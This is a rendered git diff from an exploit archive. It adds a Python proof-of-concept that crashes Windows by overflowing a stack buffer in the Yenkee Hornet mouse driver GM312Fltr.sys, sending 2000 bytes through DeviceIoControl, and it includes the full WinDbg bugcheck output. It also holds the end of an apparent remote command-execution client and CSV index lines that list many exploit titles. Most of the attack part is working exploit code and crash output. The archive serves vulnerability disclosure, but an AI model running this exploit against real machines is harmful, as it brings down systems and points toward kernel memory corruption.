|
||||
"User-Agent": "Mozilla/5.0 (Windows NT 6.1; WOW64; rv:77.0) Gecko/20190101 Firefox/77.0"
|
||||
}
|
||||
|
||||
response = requests.post(url, headers=headers, timeout=5)
|
||||
|
||||
if response.text == "":
|
||||
print(cmd + ": command not found\n")
|
||||
else:
|
||||
print(response.text)
|
||||
|
||||
if __name__ == '__main__':
|
||||
main()
|
||||
300
exploits/windows/dos/50311.py
Executable file
300
exploits/windows/dos/50311.py
Executable file
|
|
@ -0,0 +1,300 @@
|
|||
# Exploit Title: Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial-Of-Service (PoC)
|
||||
# Date: 2021/04/07
|
||||
# Exploit Author: Quadron Research Lab
|
||||
# Version: all version
|
||||
# Tested on: Windows 10 x64 HUN/ENG Professional
|
||||
# Vendor: https://www.yenkee.eu/gaming-mouse-hornet-aim/yms-3029
|
||||
# Reference: https://github.com/Quadron-Research-Lab/Kernel_Driver_bugs/tree/main/GM312Fltr
|
||||
|
||||
import ctypes, sys
|
||||
from ctypes import *
|
||||
import io
|
||||
from itertools import product
|
||||
from sys import argv
|
||||
|
||||
devicename = "GM312Fltr"
|
||||
|
||||
ioctl = 0x22245C
|
||||
|
||||
ioctl_list = '''
|
||||
0x22245C
|
||||
0x222440
|
||||
0x222441
|
||||
0x222400
|
||||
0x222404
|
||||
0x222408
|
||||
0x222420
|
||||
0x222424
|
||||
0x222448
|
||||
0x222450
|
||||
0x22245c
|
||||
0x222460
|
||||
'''
|
||||
|
||||
kernel32 = windll.kernel32
|
||||
hevDevice = kernel32.CreateFileA("\\\\.\\GM312Fltr", 0xC0000000, 0, None, 0x3, 0, None)
|
||||
|
||||
if not hevDevice or hevDevice == -1:
|
||||
print ("Not Win! Sorry!")
|
||||
|
||||
else:
|
||||
print ("OPENED!")
|
||||
|
||||
buf = 'A' * 2000
|
||||
bufLength = 2000
|
||||
|
||||
kernel32.DeviceIoControl(hevDevice, ioctl, buf, bufLength, None, 0, byref(c_ulong()), None)
|
||||
|
||||
[Bugcheck Analysis]
|
||||
Fatal System Error 0x000000f7
|
||||
(0xBEBEA1CAEAF0A2C1,0x0000F80736BC1742,0xFFFF07F8C943E8BD,0x0000000000000000)
|
||||
|
||||
Break instruction exception - code 80000003 (first chance)
|
||||
nt!DbgBreakPointWithStatus
|
||||
fffff807`2e1feb90 cc int 3
|
||||
0 kd !analyze
|
||||
Connected to Windows 10 19041 x64 target at (Mon Jun 14 204816.370 2021 (UTC + 200)), ptr64 TRUE
|
||||
Loading Kernel Symbols
|
||||
...............................................................
|
||||
................................................................
|
||||
........................
|
||||
|
||||
Press ctrl-c (cdb, kd, ntsd) or ctrl-break (windbg) to abort symbol loads that take too long.
|
||||
Run !sym noisy before .reload to track down problems loading symbols.
|
||||
|
||||
........................................
|
||||
.............................
|
||||
Loading User Symbols
|
||||
.............................................
|
||||
Loading unloaded module list
|
||||
........
|
||||
|
||||
|
||||
Bugcheck Analysis
|
||||
|
||||
|
||||
|
||||
DRIVER_OVERRAN_STACK_BUFFER (f7)
|
||||
A driver has overrun a stack-based buffer. This overrun could potentially
|
||||
allow a malicious user to gain control of this machine.
|
||||
DESCRIPTION
|
||||
A driver overran a stack-based buffer (or local variable) in a way that would
|
||||
have overwritten the function's return address and jumped back to an arbitrary
|
||||
address when the function returned. This is the classic buffer overrun
|
||||
hacking attack and the system has been brought down to prevent a malicious user
|
||||
from gaining complete control of it.
|
||||
Do a kb to get a stack backtrace -- the last routine on the stack before the
|
||||
buffer overrun handlers and bugcheck call is the one that overran its local
|
||||
variable(s).
|
||||
Arguments
|
||||
Arg1 bebea1caeaf0a2c1, Actual security check cookie from the stack
|
||||
Arg2 0000f80736bc1742, Expected security check cookie
|
||||
Arg3 ffff07f8c943e8bd, Complement of the expected security check cookie
|
||||
Arg4 0000000000000000, zero
|
||||
|
||||
Debugging Details
|
||||
------------------
|
||||
|
||||
|
||||
BUGCHECK_CODE f7
|
||||
|
||||
BUGCHECK_P1 bebea1caeaf0a2c1
|
||||
|
||||
BUGCHECK_P2 f80736bc1742
|
||||
|
||||
BUGCHECK_P3 ffff07f8c943e8bd
|
||||
|
||||
BUGCHECK_P4 0
|
||||
|
||||
PROCESS_NAME pythonw.exe
|
||||
|
||||
SYMBOL_NAME GM312Fltr+e1e
|
||||
|
||||
MODULE_NAME GM312Fltr
|
||||
|
||||
IMAGE_NAME GM312Fltr.sys
|
||||
|
||||
FAILURE_BUCKET_ID 0xF7_MISSING_GSFRAME_STACKPTR_ERROR_GM312Fltr!unknown_function
|
||||
|
||||
FAILURE_ID_HASH {b8e05604-2a11-789a-ad29-fc4916710f2d}
|
||||
|
||||
Followup MachineOwner
|
||||
---------
|
||||
|
||||
0 kd kb
|
||||
RetAddr Args to Child Call Site
|
||||
fffff807`2e312d12 fffff807`344a4ae0 fffff807`2e17d000 00000000`00000000 00000000`00000000 nt!DbgBreakPointWithStatus
|
||||
fffff807`2e3122f6 00000000`00000003 fffff807`344a4ae0 fffff807`2e20bbc0 00000000`000000f7 nt!KiBugCheckDebugBreak+0x12
|
||||
fffff807`2e1f6df7 fffff807`344a5210 00000000`00000000 fffff807`36bc18c8 fffff807`344a51a8 nt!KeBugCheck2+0x946
|
||||
fffff807`36bc0e1e 00000000`000000f7 bebea1ca`eaf0a2c1 0000f807`36bc1742 ffff07f8`c943e8bd nt!KeBugCheckEx+0x107
|
||||
fffff807`36bc0ea7 fffff807`344a5210 00000000`00000000 fffff807`344a5748 fffff807`344a5720 GM312Fltr+0xe1e
|
||||
fffff807`2e1ffbaf fffff807`36bc0e94 00000000`00000000 00000000`00000000 00000000`00000000 GM312Fltr+0xea7
|
||||
fffff807`2e087547 fffff807`344a5710 00000000`00000000 ffffe08b`abb1e380 fffff807`36bc0b5d nt!RtlpExecuteHandlerForException+0xf
|
||||
fffff807`2e086136 ffffe08b`abb1dcf8 fffff807`344a5e20 ffffe08b`abb1dcf8 ffffe30a`242183c0 nt!RtlDispatchException+0x297
|
||||
fffff807`2e1f7b82 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 nt!KiDispatchException+0x186
|
||||
fffff807`2e1f7b50 fffff807`2e208da5 00000000`ffffffff fffff807`2e0c3216 00000000`00000010 nt!KxExceptionDispatchOnExceptionStack+0x12
|
||||
fffff807`2e208da5 00000000`ffffffff fffff807`2e0c3216 00000000`00000010 00000000`00000246 nt!KiExceptionDispatchOnExceptionStackContinue
|
||||
fffff807`2e204ae0 ffffe30a`1ce27c00 ffffe30a`1ce21010 00000000`00000000 00000000`00000000 nt!KiExceptionDispatch+0x125
|
||||
fffff807`2e1fe0c7 fffff807`2aab9180 000fa40d`b19b3dfe ffffe30a`27381080 fffff807`2eaea710 nt!KiGeneralProtectionFault+0x320
|
||||
fffff807`2e1fda76 7fffe30a`29e4bb10 00000000`ffffffff 00000000`00000000 00000000`00000000 nt!SwapContext+0x377
|
||||
fffff807`2e00c970 ffffe30a`00000006 00000000`ffffffff 00000000`00000000 ffffe30a`24218498 nt!KiSwapContext+0x76
|
||||
fffff807`2e00be9f ffffe30a`27381080 fffff807`36b819b6 ffffe08b`abb1e270 00000000`00000000 nt!KiSwapThread+0x500
|
||||
fffff807`2e00b743 ffffe30a`00000034 00000000`00000000 ffffe30a`23c6d800 ffffe30a`273811c0 nt!KiCommitThreadWait+0x14f
|
||||
fffff807`36bc0ca2 ffffe08b`abb1e350 fffff807`00000000 00000000`00000000 00000000`00004100 nt!KeWaitForSingleObject+0x233
|
||||
fffff807`36bc0b5d ffffffff`ff676980 00000000`00000000 00000000`00000bb8 fffff807`35142017 GM312Fltr+0xca2
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 GM312Fltr+0xb5d
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 41414141`41414141 00000000`0020027f 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 41414141`41414141 00000000`0020027f 00000000`5c4eafe0 0x41414141`41414141
|
||||
41414141`41414141 41414141`41414141 00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0x41414141`41414141
|
||||
41414141`41414141 00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 0x41414141`41414141
|
||||
00000000`0020027f 00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 00000000`00000000 0x41414141`41414141
|
||||
00000000`5c4eafe0 00000000`00000000 0000ffff`00001f80 00000000`00000000 00000000`00000000 0x20027f
|
||||
00000000`00000000 0000ffff`00001f80 00000000`00000000 00000000`00000000 00000000`00000000 MSVCR90!pow+0x4e0
|
||||
|
|
@ -5252,6 +5252,7 @@ id,file,description,date,author,type,platform,port
|
|||
40524,exploits/osx/dos/40524.py,"VOX Music Player 2.8.8 - '.pls' Denial of Service",1970-01-01,"Antonio Z.",dos,osx,
|
||||
40536,exploits/windows/dos/40536.py,"Mozilla Firefox 49.0.1 - Denial of Service",1970-01-01,"sultan albalawi",dos,windows,
|
||||
43596,exploits/windows/dos/43596.py,"OBS Studio 20.1.3 - Local Buffer Overflow",1970-01-01,ScrR1pTK1dd13,dos,windows,
|
||||
50311,exploits/windows/dos/50311.py,"Yenkee Hornet Gaming Mouse - 'GM312Fltr.sys' Denial-Of-Service (PoC)",1970-01-01,"Quadron Research Lab",dos,windows,
|
||||
43710,exploits/windows/dos/43710.js,"Microsoft Edge Chakra JIT - Incorrect Bounds Calculation",1970-01-01,"Google Security Research",dos,windows,
|
||||
43713,exploits/windows/dos/43713.js,"Microsoft Edge Chakra - 'JavascriptGeneratorFunction::GetPropertyBuiltIns' Type Confusion",1970-01-01,"Google Security Research",dos,windows,
|
||||
43715,exploits/windows/dos/43715.js,"Microsoft Edge Chakra - Incorrect Scope Handling",1970-01-01,"Google Security Research",dos,windows,
|
||||
|
|
@ -17259,7 +17260,6 @@ id,file,description,date,author,type,platform,port
|
|||
35924,exploits/windows/remote/35924.py,"ClearSCADA - Remote Authentication Bypass",1970-01-01,"Jeremy Brown",remote,windows,
|
||||
35925,exploits/hardware/remote/35925.txt,"Portech MV-372 VoIP Gateway - Multiple Vulnerabilities",1970-01-01,"Zsolt Imre",remote,hardware,
|
||||
35928,exploits/windows/remote/35928.html,"Pro Softnet IDrive Online Backup 3.4.0 - ActiveX 'SaveToFile()' Arbitrary File Overwrite",1970-01-01,"High-Tech Bridge SA",remote,windows,
|
||||
35932,exploits/hardware/remote/35932.c,"VSAT Sailor 900 - Remote Overflow",1970-01-01,"Nicholas Lemonias",remote,hardware,
|
||||
35948,exploits/windows/remote/35948.html,"X360 VideoPlayer ActiveX Control 2.6 - ASLR + DEP Bypass",1970-01-01,Rh0,remote,windows,
|
||||
35949,exploits/windows/remote/35949.txt,"Symantec Encryption Management Server < 3.2.0 MP6 - Remote Command Injection",1970-01-01,"Paul Craig",remote,windows,
|
||||
35961,exploits/hp-ux/remote/35961.py,"HP Data Protector 8.x - Remote Command Execution",1970-01-01,"Juttikhun Khamchaiyaphum",remote,hp-ux,
|
||||
|
|
@ -44426,3 +44426,5 @@ id,file,description,date,author,type,platform,port
|
|||
50305,exploits/php/webapps/50305.py,"Online Food Ordering System 2.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Abdullah Khawaja",webapps,php,
|
||||
50306,exploits/php/webapps/50306.py,"Church Management System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Abdullah Khawaja",webapps,php,
|
||||
50307,exploits/php/webapps/50307.txt,"Budget and Expense Tracker System 1.0 - Authenticated Bypass",1970-01-01,"Prunier Charles-Yves",webapps,php,
|
||||
50308,exploits/php/webapps/50308.txt,"Budget and Expense Tracker System 1.0 - Remote Code Execution (RCE) (Unauthenticated)",1970-01-01,"Abdullah Khawaja",webapps,php,
|
||||
50310,exploits/php/webapps/50310.py,"WebsiteBaker 2.13.0 - Remote Code Execution (RCE) (Authenticated)",1970-01-01,"Halit AKAYDIN",webapps,php,
|
||||
|
|
|
|||
|
Can't render this file because it is too large.
|
Loading…
Add table
Reference in a new issue